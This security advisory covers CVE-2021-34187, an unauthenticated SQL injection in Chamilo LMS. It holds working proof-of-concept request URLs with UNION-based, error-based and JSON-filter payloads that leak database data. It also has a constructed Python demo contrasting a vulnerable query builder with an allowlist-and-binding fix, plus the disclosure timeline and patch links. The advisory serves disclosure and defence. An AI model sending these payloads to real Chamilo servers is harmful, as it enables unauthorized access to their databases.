CVE-2021-34187. Unauthenticated SQL injection in Chamilo LMS 1.11.x and (dev version of) 2.0

Product: Chamilo LMS 1.11.x, 2.x

Vulnerability: SQL injection

Author: Kutlymurat Mambetniyazov (@manfromkz)

Acknowledgements: NitroTeam.kz

Date: 05/25/2021

Description: Lack of sanitization of the GET parameters searchField, filters and filters2 in /main/inc/ajax/model.ajax.php leads to multiple unauthenticated SQL injections (the endpoint is reachable without a session, so no login is required).

Tested on: Windows 10 x64, Apache 2.4, 10.3.22-MariaDB, PHP 7.4, Chamilo LMS 1.11.x and 2.x.

PoC:

Version 1.11.x, parameter – searchField (UNION-based; the result of CONCAT((select version())) is returned in the grid data)

http://chamilo1.11.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+version())),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0

Version 2.x, parameter – searchField (error-based; version() is leaked through the extractvalue() XPath error)

http://chamilo2.x/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_search=1&searchField=1))and(1)%20UNION%20ALL%20SELECT%20CONCAT((select+extractvalue(0x0a,concat(0x0a,(version()))))),NULL,NULL,NULL--%20-)and((1=&searchOper=ni&searchString=testx&filters2={}&from_course_session=0

Parameters: filters, filters2 (the injection sits in the "field" member of a jqGrid filter rule inside the JSON value)

http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
http://chamilo/main/inc/ajax/model.ajax.php?a=get_sessions_tracking&work_id=1&rows=0&page=1&sidx=0&sord=test&_force_search=1&search=1&searchField=1&searchOper=ni&searchString=testx&filters2={%22rules%22:[{%22field%22:%221))union%20select%20version(),2,3,4--%20-%22,%22op%22:%22in%22,%22data%22:%22test%22}],%22groupOp%22:%22and%22}&from_course_session=0
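The bug class behind the PoCs above, as an added illustration that is not Chamilo's model.ajax.php and not the vendor's patch: a jqGrid-style filters JSON ({"groupOp": ..., "rules": [{"field", "op", "data"}]}) is turned into a WHERE clause twice, once by string interpolation of the "field" member (the vulnerable shape) and once with a column allowlist and bound parameters (the hardened shape). The searchField/searchOper/searchString triple is the single-rule form of the same structure, so one builder covers both parameter sets. The table, its rows, the query shape and the column names are invented for the example; SQLite stands in for MariaDB, so the leaked value is sqlite_version() rather than version(), but the injected field string is otherwise the one from the filters PoC.

```python
"""Constructed example for CVE-2021-34187's bug class (not Chamilo code)."""
import json
import sqlite3

# jqGrid operator codes -> SQL (subset; the PoC uses "in" / "ni").
OPS = {"eq": "=", "ne": "<>", "lt": "<", "gt": ">", "in": "IN", "ni": "NOT IN"}
# Hypothetical columns of the table the grid reads from (assumption).
ALLOWED_FIELDS = {"id", "title", "status", "owner"}
BASE = "SELECT id, title, status, owner FROM sessions"


def single_search_filters(search_field, search_oper, search_string):
    """jqGrid single-field search (searchField/searchOper/searchString) is the
    one-rule equivalent of the filters JSON."""
    rule = {"field": search_field, "op": search_oper, "data": search_string}
    return json.dumps({"groupOp": "AND", "rules": [rule]})


def build_vulnerable(filters_json):
    """The flaw: rule['field'] is pasted into the SQL untouched. Escaping the
    quotes in rule['data'] does nothing for an identifier position."""
    f = json.loads(filters_json)
    parts = []
    for rule in f["rules"]:
        op = OPS[rule["op"]]
        data = rule["data"].replace("'", "''")
        if op in ("IN", "NOT IN"):
            value = "(" + ", ".join(f"'{v.strip()}'" for v in data.split(",")) + ")"
        else:
            value = f"'{data}'"
        parts.append(f"({rule['field']} {op} {value})")
    glue = " AND " if f.get("groupOp", "AND").upper() == "AND" else " OR "
    return f"{BASE} WHERE ({glue.join(parts)})"


def build_hardened(filters_json):
    """Column names from an allowlist, operators from a fixed map, every user
    value a bound parameter. Returns (sql, params)."""
    f = json.loads(filters_json)
    parts, params = [], []
    for rule in f["rules"]:
        field = rule["field"]
        if field not in ALLOWED_FIELDS:
            raise ValueError(f"unknown filter field: {field!r}")
        op = OPS.get(rule["op"])
        if op is None:
            raise ValueError(f"unknown operator: {rule['op']!r}")
        if op in ("IN", "NOT IN"):
            values = [v.strip() for v in rule["data"].split(",")]
            parts.append(f"({field} {op} ({', '.join('?' * len(values))}))")
            params.extend(values)
        else:
            parts.append(f"({field} {op} ?)")
            params.append(rule["data"])
    glue = " AND " if f.get("groupOp", "AND").upper() == "AND" else " OR "
    return f"{BASE} WHERE ({glue.join(parts)})", params


def demo_db():
    """In-memory table with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sessions (id INTEGER, title TEXT, status TEXT, owner TEXT)")
    con.executemany("INSERT INTO sessions VALUES (?, ?, ?, ?)",
                    [(1, "Intro", "open", "alice"), (2, "Advanced", "closed", "bob")])
    return con


# Same "field" string as the filters PoC, with sqlite_version() for version().
INJECTED_FILTERS = single_search_filters(
    "1)) UNION SELECT sqlite_version(),2,3,4-- -", "in", "test")
LEGIT_FILTERS = single_search_filters("owner", "in", "alice,carol")


def run_vulnerable(filters_json=INJECTED_FILTERS):
    return demo_db().execute(build_vulnerable(filters_json)).fetchall()


def run_hardened(filters_json=LEGIT_FILTERS):
    sql, params = build_hardened(filters_json)
    return demo_db().execute(sql, params).fetchall()


def hardened_rejects(filters_json=INJECTED_FILTERS):
    """True when the allowlist refuses the crafted field name."""
    try:
        build_hardened(filters_json)
    except ValueError:
        return True
    return False


def leaked_version(rows):
    """First column of the UNION row, i.e. the value the attacker exfiltrates."""
    for r in rows:
        if r[0] not in (1, 2):
            return r[0]
    return None


def db_version():
    return sqlite3.sqlite_version


if __name__ == "__main__":
    print(build_vulnerable(INJECTED_FILTERS))
    print("leaked:", leaked_version(run_vulnerable()))
    print("hardened rejects payload:", hardened_rejects())
    print("hardened legit result:", run_hardened())
```

The vulnerable builder shows why `Database::escape_string`-style quoting on the data value is not a fix here: the attacker controls an identifier, not a string literal, so the only sound defences are mapping the field to a known column and binding the values.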

Timeline of the vulnerability:

05/25/2021 – vulnerability discovered
05/27/2021 – notification to vendor
05/28/2021 – confirmation by vendor and patch release (version 1.11.x – https://github.com/chamilo/chamilo-lms/commit/f7f93579ed64765c2667910b9c24d031b0a00571 and version 2.x – https://github.com/chamilo/chamilo-lms/commit/005dc8e9eccc6ea35264064ae09e2e84af8d5b59)
06/01/2021 – published on the vendor's issue tracker (https://support.chamilo.org/projects/1/wiki/Security_issues#Issue-67-2021-05-27-High-impact-very-high-risk-Unauthenticated-SQL-injection)
06/20/2021 – advisory published
06/28/2021 – CVE-2021-34187 was assigned by MITRE
